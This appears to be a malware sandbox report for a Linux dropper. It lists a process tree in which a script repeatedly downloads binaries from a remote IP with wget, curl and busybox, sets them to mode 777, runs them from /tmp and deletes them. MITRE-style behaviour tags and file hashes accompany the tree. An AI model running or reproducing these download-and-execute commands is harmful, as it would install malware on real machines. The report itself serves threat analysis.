/bin/chmodchmod 777 7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR2⤵
- File and Directory Permissions Modification
PID:932
-
-
/tmp/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR./7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR2⤵
- Executes dropped EXE
PID:933
-
-
/bin/rmrm 7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR2⤵PID:934
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t2⤵PID:935
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:936
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t2⤵PID:937
-
-
/bin/chmodchmod 777 YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t2⤵
- File and Directory Permissions Modification
PID:938
-
-
/tmp/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t./YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t2⤵
- Executes dropped EXE
PID:939
-
-
/bin/rmrm YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t2⤵PID:940
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG2⤵
- System Network Configuration Discovery
PID:941
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:942
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG2⤵
- System Network Configuration Discovery
PID:943
-
-
/bin/chmodchmod 777 6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG2⤵
- File and Directory Permissions Modification
PID:944
-
-
/tmp/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG./6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:945
-
-
/bin/rmrm 6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG2⤵
- System Network Configuration Discovery
PID:946
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK2⤵PID:947
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:948
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK2⤵PID:949
-
-
/bin/chmodchmod 777 nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK2⤵
- File and Directory Permissions Modification
PID:950
-
-
/tmp/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK./nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK2⤵
- Executes dropped EXE
PID:951
-
-
/bin/rmrm nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK2⤵PID:952
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt2⤵PID:953
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:954
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt2⤵PID:955
-
-
/bin/chmodchmod 777 I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt2⤵
- File and Directory Permissions Modification
PID:956
-
-
/tmp/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt./I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt2⤵
- Executes dropped EXE
PID:957
-
-
/bin/rmrm I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt2⤵PID:958
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw2⤵PID:959
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:960
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw2⤵PID:961
-
-
/bin/chmodchmod 777 VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw2⤵
- File and Directory Permissions Modification
PID:962
-
-
/tmp/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw./VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw2⤵
- Executes dropped EXE
PID:963
-
-
/bin/rmrm VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw2⤵PID:964
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ2⤵PID:965
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:966
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ2⤵PID:967
-
-
/bin/chmodchmod 777 3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ2⤵
- File and Directory Permissions Modification
PID:968
-
-
/tmp/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ./3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ2⤵
- Executes dropped EXE
PID:969
-
-
/bin/rmrm 3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ2⤵PID:970
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q2⤵PID:971
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:972
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q2⤵PID:973
-
-
/bin/chmodchmod 777 zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q2⤵
- File and Directory Permissions Modification
PID:974
-
-
/tmp/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q./zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q2⤵
- Executes dropped EXE
PID:975
-
-
/bin/rmrm zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q2⤵PID:976
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97